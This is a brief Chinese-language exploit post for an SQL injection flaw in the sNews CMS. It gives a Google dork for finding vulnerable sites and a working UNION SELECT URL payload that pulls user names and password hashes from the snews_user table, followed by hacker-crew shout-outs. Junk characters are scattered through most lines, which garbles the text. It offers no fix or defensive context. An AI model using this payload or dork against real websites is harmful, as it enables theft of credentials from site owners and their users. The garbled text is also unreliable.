标题: CMS snews SQL Injection Vulnerability
$ n9 B) g+ f; d" P% b* y2 d作者: By onestree9 E7 K& h u' w4 d( V
下载地址 : http://snewscms.com/) U) D2 @% Q7 c: s; t, \
测试平台 : ubuntu 12.10 / win 7- c" M# I. ^; Z1 s) Z5 V; j
关键词: inurl:"tanyakan pada rumput yang bergoyang"9 ]5 ]+ q# p0 q) r
4 Y0 W2 w" r+ \) a( a) T
7 \3 _; T, K9 R8 l. N7 P; X- \*************************************************************
. @* u9 S; |* d - [4 B/ I3 Z8 m- g
SQL poc:4 U2 K2 f3 |/ ~, T; J. k q
1 B/ V) S5 W: i) l" C
http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]% w/ G: A: I% O, o- t7 ~$ t
% A. ]& m2 `8 u! g# Z示例
6 O$ Q7 P8 H. ~# E1 U) \( E7 G
5 l, C6 e6 x2 G0 a5 n& [1 E' Phttp://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*6 F- @# d. k5 D, i. z
; C% B* w0 f8 q2 | D# |
3 n# F p% k' ~3 {
致谢:) A- }! H2 V. y O
# U" e5 z; }& F9 J" j Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
& f, ?/ T8 r8 W. K8 r
D0 z9 n$ w" \2 G/ K indonesiancoder - moeslimh4x0r - go-coder {/ T* ?- N6 G) J7 n
# o# W) k1 X9 q: |: A* O% f" xspesial my hunny :*# D! L" q4 o! n- U. U) H
|